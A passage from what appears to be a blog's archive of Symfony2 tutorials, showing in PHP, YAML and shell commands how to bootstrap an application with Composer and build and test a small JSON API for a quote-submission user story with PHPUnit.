In this one we'll implement the first User Story, by writing tests first.
Note: writing tests before writing any code is part of the Test Driven Development (TDD) methodology.
With the help of our Scrum Master, our Product Owner (Nostradamus) managed to write the following user story:
As a User
I want to be able to submit a new quote
In order to make it available
Our first reflex will be to write a functional test. First create the directory:
mkdir -p src/Fortune/ApplicationBundle/Tests/Controller
Then the test class:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Controller/QuoteControllerTest.php
namespace Fortune\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class QuoteControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), $headers, $content);
return $client->getResponse();
}
public function testSubmitNewQuote()
{
$response = $this->post('/api/quotes', array('content' => '<KnightOfNi> Ni!'));
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode());
}
}
Now we need to link the /quotes URL to a controller, so let's edit the
configuration:
# File: app/config/routing.yml
submit_quote:
path: /api/quotes
methods:
- POST
defaults:
_controller: FortuneApplicationBundle:Quote:submit
There weren't any controllers until now, so we create the directory:
mkdir src/Fortune/ApplicationBundle/Controller
And finally the controller class:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
$answer['quote']['content'] = $postedValues['content'];
return new JsonResponse($answer, Response::HTTP_CREATED);
}
}
Now let's run our tests:
./vendor/bin/phpunit -c app
All green! This makes us confident enough to commit our work:
git add -A
git commit -m 'Created submission of quotes'
The submitted content shouldn't be empty. Let's add a test for the bad cases:
<?php
// File: src/Fortune/ApplicationBundle/Tests/Controller/QuoteControllerTest.php
namespace Fortune\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class QuoteControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), $headers, $content);
return $client->getResponse();
}
public function testSubmitNewQuote()
{
$response = $this->post('/api/quotes', array('content' => '<KnightOfNi> Ni!'));
$this->assertSame(Response::HTTP_CREATED, $response->getStatusCode());
}
public function testSubmitEmptyQuote()
{
$response = $this->post('/api/quotes', array('content' => ''));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
public function testSubmitNoQuote()
{
$response = $this->post('/api/quotes', array());
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
}
Now let's fix the new tests:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$answer['quote']['content'] = $postedValues['content'];
return new JsonResponse($answer, Response::HTTP_CREATED);
}
}
Finally run the tests:
./vendor/bin/phpunit -c app
All green! Let's call it a day and commit our work:
git add -A
git commit -m 'Managed submission of empty/no quotes'
For those who didn't practice a lot with Symfony2, this article should have demonstrated how quick and simple it is to implement the first User Story (test and code alike).
In the next article, we'll learn how to work with services.
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
You know the basics of the Symfony2 framework (Composer, empty application, bundle, controller and functional test with PHPUnit) and you want to learn more about how to extend it (and understand what you're doing)?
Then this series of articles is for you :) .
If you don't feel confident about the prerequisites, have a look at the Learn Symfony2 series. Don't worry, we'll start with a bit of practice before learning anything new.
In the first article of this series, we'll discover our customer's needs and we'll bootstrap our application.
In order to have real world examples, we'll need a use case. The Knights of Ni were pretty satisfied with our previous work, and they recommended us to Nostradamus!
Nostradamus is a fortune teller and wants to jump on the internet bandwagon. He wants us to create a fortune application where users can submit quotes.
Our first task will be to create an empty application so we can start working. We could use the Symfony Standard Edition, but in order to understand what really happens behind the scenes we'll use an emptier distribution.
First make sure you have the latest version of Composer installed:
curl -sS https://getcomposer.org/installer | php
sudo mv composer.phar /usr/local/bin/composer
Then ask Composer to create the boilerplate of our application, using the Symfony2 Emptier Edition:
composer create-project 'gnugat/sf2-emptier' fortune '0.1.*'
cd fortune
This distribution is similar to the empty application we created in the learn Symfony2 series. It contains the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── LICENSE
├── README.md
└── web
└── app.php
Remove the documentation files:
rm README.md LICENSE
Change the composer.json information:
{
"name": "nostradamus/fortune",
"license": "proprietary",
"type": "project",
"description": "A collection of quotes",
"autoload": {
"psr-4": { "": "src/" }
},
"require": {
"php": ">=5.3.17",
"symfony/symfony": "~2.4"
},
"require-dev": {
"phpunit/phpunit": "~4.1"
}
}
Next you'll have to configure the project specific parameters:
cp app/config/parameters.yml.dist app/config/parameters.yml
Don't forget to edit app/config/parameters.yml and change the value of the
secret parameter:
parameters:
secret: hazuZRqYGdRrL8ATdB8kAqBZ
Tip: Use random.org to generate your secret token.
Note: For security reasons, this parameter file is ignored by git. This means the file must be created on each installation.
Let's commit our hard work:
git init
git add -A
git add -f app/logs/.gitkeep app/cache/.gitkeep
git commit -m 'Created a Symfony2 Emptier application'
We will also need an Application bundle. First we create the directories:
mkdir -p src/Fortune/ApplicationBundle
Then the Bundle class:
<?php
// File: src/Fortune/ApplicationBundle/FortuneApplicationBundle.php
namespace Fortune\ApplicationBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class FortuneApplicationBundle extends Bundle
{
}
And finally register it in the application's kernel:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Fortune\ApplicationBundle\FortuneApplicationBundle(), // <-- Here!
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
We're now ready to get started with our real concern, so let's commit our work:
git add -A
git commit -m 'Created ApplicationBundle'
In order for your website to be served, you'll need to configure your web server. This configuration is well explained in the documentation, so here's a sample Apache vhost:
<VirtualHost *:80>
ServerName fortune.local
DocumentRoot /home/loic.chardonnet/Projects/gnugat/fortune/web
ErrorLog "/home/loic.chardonnet/Projects/gnugat/fortune/app/logs/apache_errors.log"
CustomLog "/home/loic.chardonnet/Projects/gnugat/fortune/app/logs/apache_accesses.log" common
<Directory /home/loic.chardonnet/Projects/gnugat/fortune/web>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /app.php [QSA,L]
</IfModule>
</Directory>
</VirtualHost>
If you run into permission problems (like writing in cache and logs),
you might consider changing the APACHE_RUN_USER and APACHE_RUN_GROUP
environment variables in /etc/apache2/envvars to your own user and
group.
Using Composer's create-project command with a Symfony2 Distribution is the
quickest way to bootstrap a project.
In the next article, we will start to work on our first User Story.
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the conclusion of the series on learning the Symfony2 framework. Have a look at the first five:
In the previous articles we created a tested application for the Knight of Ni with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Knight
│ └── ApplicationBundle
│ ├── Controller
│ │ └── ApiController.php
│ ├── KnightApplicationBundle.php
│ └── Tests
│ └── Controller
│ └── ApiControllerTest.php
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
This article will be like a cheat sheet of what we saw in the previous ones.
Composer will help you install and update third party libraries.
Download it once and for all and install it in your global binaries:
curl -sS https://getcomposer.org/installer | php
sudo mv ./composer.phar /usr/local/bin/composer
It should then be executable like this: composer.
composer require [--dev] <vendor/name:version>
composer install
composer update
The available third party libraries can be found on Packagist.
Here's an explanation of Composer version constraints by Igor.
In these articles, we create a project from scratch, but the recommended way of
starting a Symfony2 application is to use the Composer bootstrap command:
composer create-project <vendor/name> <path-to-install>
You could use the Symfony Standard Edition
(symfony/framework-standard-edition), or any other distribution.
I'd advise you to use an empty boilerplate with the Symfony Empty Edition:
composer create-project gnugat/symfony-framework-empty-edition <path-to-install>
Tip: For the production server, use this command to install the project's dependencies (the third party libraries):
composer install --no-dev --optimize-autoloader
They integrate your code with the framework. More specifically, they configure the Kernel's dependency injection container.
Note: To learn more about Dependency Injection, have a look at the following articles:
The only bundle you'll need to create is the ApplicationBundle, where all your
code will be. Here's how to create a bundle:
mkdir -p src/<Vendor>/<Name>Bundle
$EDITOR src/<Vendor>/<Name>Bundle/<Vendor><Name>Bundle.php
$EDITOR app/AppKernel.php
A Bundle class looks like this:
<?php
// File: src/Knight/ApplicationBundle/KnightApplicationBundle.php
namespace Knight\ApplicationBundle;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class KnightApplicationBundle extends Bundle
{
}
In your application, there's only a few files related to the Symfony2 framework. Here's the list of the ones you'll usually edit.
The app/AppKernel.php file is where the bundles are registered and where the
configuration is loaded. You'll only need to edit it when you install a new
bundle.
Here's how we would proceed: first install the bundle via Composer:
composer require [--dev] <vendor/name:version>
Then register it in the application's kernel:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Symfony\Bundle\SecurityBundle\SecurityBundle(),
new Symfony\Bundle\TwigBundle\TwigBundle(),
new Symfony\Bundle\MonologBundle\MonologBundle(),
new Symfony\Bundle\AsseticBundle\AsseticBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
// Add your bundles here!
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
$bundles[] = new Symfony\Bundle\WebProfilerBundle\WebProfilerBundle();
$bundles[] = new Sensio\Bundle\DistributionBundle\SensioDistributionBundle();
$bundles[] = new Sensio\Bundle\GeneratorBundle\SensioGeneratorBundle();
// Or here, if you want it to only be available in dev or test environment
}
return $bundles;
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
The app/config/routing.yml file is where you will link a controller's action
to a URL. Here's an example:
# File: app/config/routing.yml
ni:
path: /api/ni
methods:
- POST
defaults:
_controller: KnightApplicationBundle:Api:ni
question_to_cross_the_bridge:
path: /api/question/{number}
methods:
- GET
defaults:
_controller: KnightApplicationBundle:Api:question
As you can see, you can tell the routing to use placeholders, which will then be available in the controller via the Request object:
$request->attributes->get('number'); // attributes is an instance of ParameterBag
Each route is associated to a controller's action.
A controller is a class located in src/<Vendor>/ApplicationBundle/Controller,
suffixed with Controller.
An action is a controller's public method, suffixed with Action, which takes
a Request $request parameter and must return an instance of the Response
object:
<?php
// File: src/Knight/ApplicationBundle/Controller/ApiController.php
namespace Knight\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class ApiController extends Controller
{
public function niAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
$answer = array('answer' => 'Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv');
$statusCode = Response::HTTP_OK;
if (!isset($postedValues['offering']) || 'shrubbery' !== $postedValues['offering']) {
$answer['answer'] = 'Ni';
$statusCode = Response::HTTP_UNPROCESSABLE_ENTITY;
}
return new JsonResponse($answer, $statusCode);
}
}
Note: you can create sub-directories in src/<Vendor>/ApplicationBundle/Controller,
allowing you to categorize your controllers. In the routing, this would look
like this: KnightApplicationBundle:Subdirectory\Controller:action.
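For instance, a hypothetical controller living in a Payment sub-directory could be referenced like this (made-up route and controller names, shown only to illustrate the notation):

```yaml
# File: app/config/routing.yml
pay_tax:
    path: /api/tax
    methods:
        - POST
    defaults:
        # Maps to Knight\ApplicationBundle\Controller\Payment\TaxController::payAction()
        _controller: KnightApplicationBundle:Payment\Tax:pay
```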
Of course you can use any test framework with a Symfony2 project. PHPUnit is one of them, and a popular one, so we'll use it for our examples.
Functional tests mirror the controllers and check if the status code is successful. If you're building an API, you can check the status code more precisely:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertSame(Response::HTTP_OK, $response->getStatusCode());
}
public function testOfferingTheWrongThing()
{
$response = $this->post('/api/ni', array('offering' => 'hareng'));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
}
The WebTestCase class is provided by the framework: it creates an application
(just like we do in web/app.php), so you can send requests and test the
response.
You can put your code anywhere in src/<Vendor>/ApplicationBundle.
Who said you needed to decouple your code from Symfony2? You can already write decoupled code!
A convention is to create directories named after the type of objects they hold.
For example the Controller directory contains controller classes (which are suffixed
with Controller). You don't have to follow it though (except for controllers
and commands): use your best judgement!
Symfony2 gets out of your way: the only classes from the framework we need to use are the controller, the request and the response.
The workflow is really simple:
1. the framework converts the HTTP request into a Request object
2. the matching controller's action receives that Request object as a parameter and must return a Response object
3. the framework converts the returned Response object into the HTTP response

Practice.
We now know the strict minimum about Symfony2, and the only way to learn more is to practice, encounter new use cases, find answers in the documentation and ask questions on StackOverflow (if they haven't been already asked).
If you really want to master Symfony2, then stay tuned: I'll start writing a new series of articles!
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fifth article of the series on learning the Symfony2 framework. Have a look at the four first ones:
In the previous articles we created an application for the Knight of Ni with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config.yml
│ │ └── routing.yml
│ └── logs
│ └── .gitkeep
├── composer.json
├── composer.lock
├── src
│ └── Knight
│ └── ApplicationBundle
│ ├── Controller
│ │ └── ApiController.php
│ └── KnightApplicationBundle.php
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
In this article, we'll create functional tests using PHPUnit.
PHPUnit is a popular test framework. Its name is deceptive: you can write any kind of test with it (unit, functional, end to end, anything).
Let's install it in our project:
composer require --dev "phpunit/phpunit:~4.1"
The --dev option will prevent Composer from installing PHPUnit when running
composer install --no-dev: this is used in production (downloads are costly).
We will need to create a configuration file to tell PHPUnit to execute the tests
found in src/Knight/ApplicationBundle/Tests, and to use Composer as an
autoloader:
<?xml version="1.0" encoding="UTF-8"?>
<!-- File: app/phpunit.xml.dist -->
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit
backupGlobals="false"
colors="true"
syntaxCheck="false"
bootstrap="../vendor/autoload.php">
<testsuites>
<testsuite name="Functional Test Suite">
<directory>../src/Knight/ApplicationBundle/Tests</directory>
</testsuite>
</testsuites>
</phpunit>
Note: By convention
you should put your tests in src/Knight/ApplicationBundle/Tests. It's not hard
coded, but if you want people to find things where they expect them to be,
you'd better follow the convention ;) .
This file is suffixed with .dist because we intend to allow developers to
override the configuration by creating an app/phpunit.xml file. Only the
distribution file should be committed, though:
echo '/app/phpunit.xml' >> .gitignore
git add -A
git commit -m 'Installed PHPUnit'
For our functional tests, we will be using the WebTestCase class: it
instantiates our AppKernel with the test environment. It also uses a
test.client service, which is disabled by default.
In order to enable this service, we must change the configuration:
# File: app/config/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
router:
resource: %kernel.root_dir%/config/routing.yml
# test: ~
Sometimes, you don't want your configuration to be the same for your tests and your production server. That's what environments are for. Let's put this test specific configuration in a different file:
# File: app/config/config_test.yml
imports:
- { resource: config.yml }
framework:
test: ~
Note: the imports parameter allows you to include other configuration files.
You can then overwrite the included parameters, or add new ones.
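For example, overriding a parameter from the imported file would look like this (a hypothetical override — our application doesn't actually need a different secret for tests):

```yaml
# File: app/config/config_test.yml
imports:
    - { resource: config.yml }

framework:
    # Overrides the value inherited from config.yml
    secret: "A test secret is no secret at all."
    # Adds a new parameter: enables the test.client service
    test: ~
```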
We should also change the registerContainerConfiguration method of the
AppKernel class in order to load the test configuration, depending on the
environment:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Knight\ApplicationBundle\KnightApplicationBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$file = 'config';
if ('test' === $this->getEnvironment()) {
$file .= '_test';
}
$loader->load(__DIR__."/config/$file.yml");
}
}
Let's commit our work:
git add -A
git commit -m 'Added test configuration'
Our test must check that the application behaves as expected. We won't be checking that it actually fulfills our business expectations. This means that checking the HTTP status code is entirely sufficient.
Let's create the directory:
mkdir -p src/Knight/ApplicationBundle/Tests/Controller
Note: Again, by convention, your test directory structure must mirror the one found in the bundle.
And then our first functional test:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
class ApiControllerTest extends WebTestCase
{
public function testOfferingTheRightThing()
{
$method = 'POST';
$uri = '/api/ni';
$parameters = array();
$files = array();
$server = array();
$content = json_encode(array(
'offering' => 'shrubbery',
));
$client = static::createClient();
$client->request($method, $uri, $parameters, $files, $server, $content);
$response = $client->getResponse();
$this->assertTrue($response->isSuccessful());
}
}
To make sure the test passes, run the following command:
./vendor/bin/phpunit -c app
Composer has installed a binary in vendor/bin, and the -c option allows you
to tell PHPUnit where the configuration is (in ./app).
This looks a bit long because of the content parameter... We can improve this with helper methods:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertTrue($response->isSuccessful());
}
}
Make sure the test still passes:
./vendor/bin/phpunit -c app
The Response's isSuccessful method only checks that the status code is 200ish.
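In other words, isSuccessful boils down to a range check on the status code — roughly this (a simplified sketch to show the idea, not Symfony2's exact source):

```php
<?php

class SimplifiedResponse
{
    private $statusCode;

    public function __construct($statusCode)
    {
        $this->statusCode = $statusCode;
    }

    // Any 2xx status code counts as successful: 200, 201, 204, etc.
    public function isSuccessful()
    {
        return $this->statusCode >= 200 && $this->statusCode < 300;
    }
}
```

This is why a plain assertTrue($response->isSuccessful()) can't distinguish a 200 from a 201: for that you need the precise assertion shown below.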
Here's a test for failure cases:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertTrue($response->isSuccessful());
}
public function testOfferingTheWrongThing()
{
$response = $this->post('/api/ni', array('offering' => 'hareng'));
$this->assertFalse($response->isSuccessful());
}
}
Run the tests:
./vendor/bin/phpunit -c app
Note: At this point running the tests should become a habit. Make sure to run them whenever you finish a change, and to run them before committing anything.
In my humble opinion, checking if the status code is 200ish and not checking the response content is entirely sufficient for functional tests.
When creating a REST API, it can prove useful to test the status code more precisely. Our application is a REST API, so let's do this:
<?php
// File: src/Knight/ApplicationBundle/Tests/Controller/ApiControllerTest.php
namespace Knight\ApplicationBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
use Symfony\Component\HttpFoundation\Response;
class ApiControllerTest extends WebTestCase
{
private function post($uri, array $data)
{
$content = json_encode($data);
$client = static::createClient();
$client->request('POST', $uri, array(), array(), array(), $content);
return $client->getResponse();
}
public function testOfferingTheRightThing()
{
$response = $this->post('/api/ni', array('offering' => 'shrubbery'));
$this->assertSame(Response::HTTP_OK, $response->getStatusCode());
}
public function testOfferingTheWrongThing()
{
$response = $this->post('/api/ni', array('offering' => 'hareng'));
$this->assertSame(Response::HTTP_UNPROCESSABLE_ENTITY, $response->getStatusCode());
}
}
Run the tests:
./vendor/bin/phpunit -c app
All green! That's comforting enough for us to commit our work and call it a day!
git add -A
git commit -m 'Added tests'
Running ./vendor/bin/phpunit -c app is less cumbersome than having to
manually run HTTPie (like in the previous article)!
Writing functional tests is easy and quick, the only thing you need to do is check if the HTTP response's status code is successful (and for REST API you need to check the precise HTTP response's status code).
The next article will be the conclusion of this series, I hope you enjoyed it!
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fourth article of the series on learning the Symfony2 framework. Have a look at the three first ones:
In the previous articles we created a one-bundled empty application with the following files:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ └── config.yml
│ └── logs
│ └── .gitkeep
├── composer.json
├── composer.lock
├── src
│ └── Knight
│ └── ApplicationBundle
│ └── KnightApplicationBundle.php
├── .gitignore
└── web
└── app.php
Running composer install should create a vendor directory, which we ignored
with git.
Here's the repository where you can find the actual code.
In this article, we'll learn more about the routing and the controllers.
In order to get familiar with the routing and controllers, we will create a route which returns nothing. The first thing to do is to configure the router:
# File: app/config/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
router:
resource: %kernel.root_dir%/config/routing.yml
We can now write our routes in a separate file:
# File: app/config/routing.yml
what_john_snow_knows:
path: /api/ygritte
methods:
- GET
defaults:
_controller: KnightApplicationBundle:Api:ygritte
As you can see, a route has:
- a name (what_john_snow_knows)
- a path (/api/ygritte)
- one or many HTTP methods (GET)
- a controller (Knight\ApplicationBundle\Controller\ApiController::ygritteAction())

Note: the _controller parameter is a shortcut composed of three parts, which
are the name of the bundle, then the unprefixed controller name and finally the
unprefixed method name.
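To make the shortcut concrete, here's a naive sketch of how it could be expanded into a fully qualified method name (for illustration only — this is not the framework's actual resolver, and the "Knight" vendor prefix is hard-coded to match this article's bundle):

```php
<?php

// Expands "KnightApplicationBundle:Api:ygritte" into
// "Knight\ApplicationBundle\Controller\ApiController::ygritteAction".
function expandControllerShortcut($shortcut)
{
    list($bundle, $controller, $action) = explode(':', $shortcut);

    // Strip the "Bundle" suffix, then split the vendor from the bundle name.
    $name = preg_replace('/Bundle$/', '', $bundle); // "KnightApplication"
    $vendor = 'Knight';                             // assumed vendor prefix
    $bundleName = substr($name, strlen($vendor));   // "Application"

    return sprintf(
        '%s\%sBundle\Controller\%sController::%sAction',
        $vendor,
        $bundleName,
        $controller,
        $action
    );
}

echo expandControllerShortcut('KnightApplicationBundle:Api:ygritte');
```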
Now we need to create the following directory:
mkdir src/Knight/ApplicationBundle/Controller
And to create the controller class:
<?php
// File: src/Knight/ApplicationBundle/Controller/ApiController.php
namespace Knight\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class ApiController extends Controller
{
public function ygritteAction(Request $request)
{
return new Response('', Response::HTTP_NO_CONTENT);
}
}
To test it, I'd advise you to use an HTTP client. Let's install HTTPie, the CLI HTTP client:
sudo apt-get install python-pip
sudo pip install --upgrade httpie
We can now test our webservice:
http GET knight.local/api/ygritte
The first line should be HTTP/1.1 204 No Content.
Our scrum master and product owner managed to write a user story for us:
As a Knight of Ni
I want a webservice which says "ni"
In order to get a shrubbery
This means we're going to need the following route:
# File: app/config/routing.yml
ni:
path: /api/ni
methods:
- POST
defaults:
_controller: KnightApplicationBundle:Api:ni
Our controller will retrieve the posted value (named offering), check if it
is a shrubbery and send back a response containing either Ni (on error) or
Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv (on success):
<?php
// File: src/Knight/ApplicationBundle/Controller/ApiController.php
namespace Knight\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class ApiController extends Controller
{
public function niAction(Request $request)
{
$postedContent = $request->getContent();
$postedValues = json_decode($postedContent, true);
$answer = array('answer' => 'Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv');
$statusCode = Response::HTTP_OK;
if (!isset($postedValues['offering']) || 'shrubbery' !== $postedValues['offering']) {
$answer['answer'] = 'Ni';
$statusCode = Response::HTTP_UNPROCESSABLE_ENTITY;
}
return new JsonResponse($answer, $statusCode);
}
}
The JsonResponse class will convert the array into JSON and set the proper
HTTP headers.
If we try to submit something fishy like this:
http POST knight.local/api/ni offering=hareng
Then we should have a response similar to:
HTTP/1.1 422 Unprocessable Entity
Cache-Control: no-cache
Content-Type: application/json
Date: Thu, 10 Jul 2014 15:23:00 GMT
Server: Apache
Transfer-Encoding: chunked
{
"answer": "Ni"
}
And when we submit the correct offering:
http POST knight.local/api/ni offering=shrubbery
Then we should have something similar to:
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Thu, 10 Jul 2014 21:42:00 GMT
Server: Apache
Transfer-Encoding: chunked
{
"answer": "Ecky-ecky-ecky-ecky-pikang-zoop-boing-goodem-zoo-owli-zhiv"
}
Here's part of the Request's API:
<?php
namespace Symfony\Component\HttpFoundation;
class Request
{
public $request; // Request body parameters ($_POST)
public $query; // Query string parameters ($_GET)
public $files; // Uploaded files ($_FILES)
public $cookies; // $_COOKIE
public $headers; // Taken from $_SERVER
public static function createFromGlobals();
public static function create(
$uri,
$method = 'GET',
$parameters = array(),
$cookies = array(),
$files = array(),
$server = array(),
$content = null
);
public function getContent($asResource = false);
}
We used createFromGlobals in our front controller (web/app.php): it does
exactly what it says: it initializes the Request from the PHP superglobals
($_POST, $_GET, etc).
The create method is really handy in tests, as we won't need to override the
values in PHP's superglobals.
The attributes listed here are all instances of
Symfony\Component\HttpFoundation\ParameterBag, which is like an object
oriented array with set, has and get methods (amongst others).
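As a quick illustration, here's how those ParameterBag methods are typically used (the 'number' parameter echoes the routing example from earlier in this series; the default value is a made-up example):

```php
<?php

use Symfony\Component\HttpFoundation\Request;

// create() builds a Request without touching PHP's superglobals,
// which is exactly why it's handy in tests.
$request = Request::create('/api/question/3?number=3', 'GET');

// has() checks for the presence of a query string parameter.
if ($request->query->has('number')) {
    // get() accepts an optional default value as second argument.
    $number = $request->query->get('number', 1);
}
```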
When you submit a form, your browser automatically sets the HTTP request's
header Content-Type to application/x-www-form-urlencoded, and the form
values are sent in the request's content like this:
offering=hareng
PHP understands this and will put the values in the $_POST superglobal. This
means you can retrieve it like this:
$request->request->get('offering');
However, when we submit something in JSON with the Content-Type set to
application/json, PHP doesn't populate $_POST. You need to retrieve the raw
data with getContent and to convert it using json_decode, as we did in our
controller.
Here's a part of the Response's API:
<?php
namespace Symfony\Component\HttpFoundation;
class Response
{
const HTTP_OK = 200;
const HTTP_CREATED = 201;
const HTTP_NO_CONTENT = 204;
const HTTP_UNAUTHORIZED = 401;
const HTTP_FORBIDDEN = 403;
const HTTP_NOT_FOUND = 404;
const HTTP_UNPROCESSABLE_ENTITY = 422; // RFC4918
public $headers; // @var Symfony\Component\HttpFoundation\ResponseHeaderBag
public function __construct($content = '', $status = 200, $headers = array());
public function getContent();
public function getStatusCode();
public function isSuccessful();
}
There are a lot of HTTP status code constants, so I've selected only those I'd use the most.
You can set and get the Response's headers via a public property which is also
a ParameterBag.
The constructor allows you to set the content, status code and headers.
The three other methods are mostly used in tests. There are a lot of is
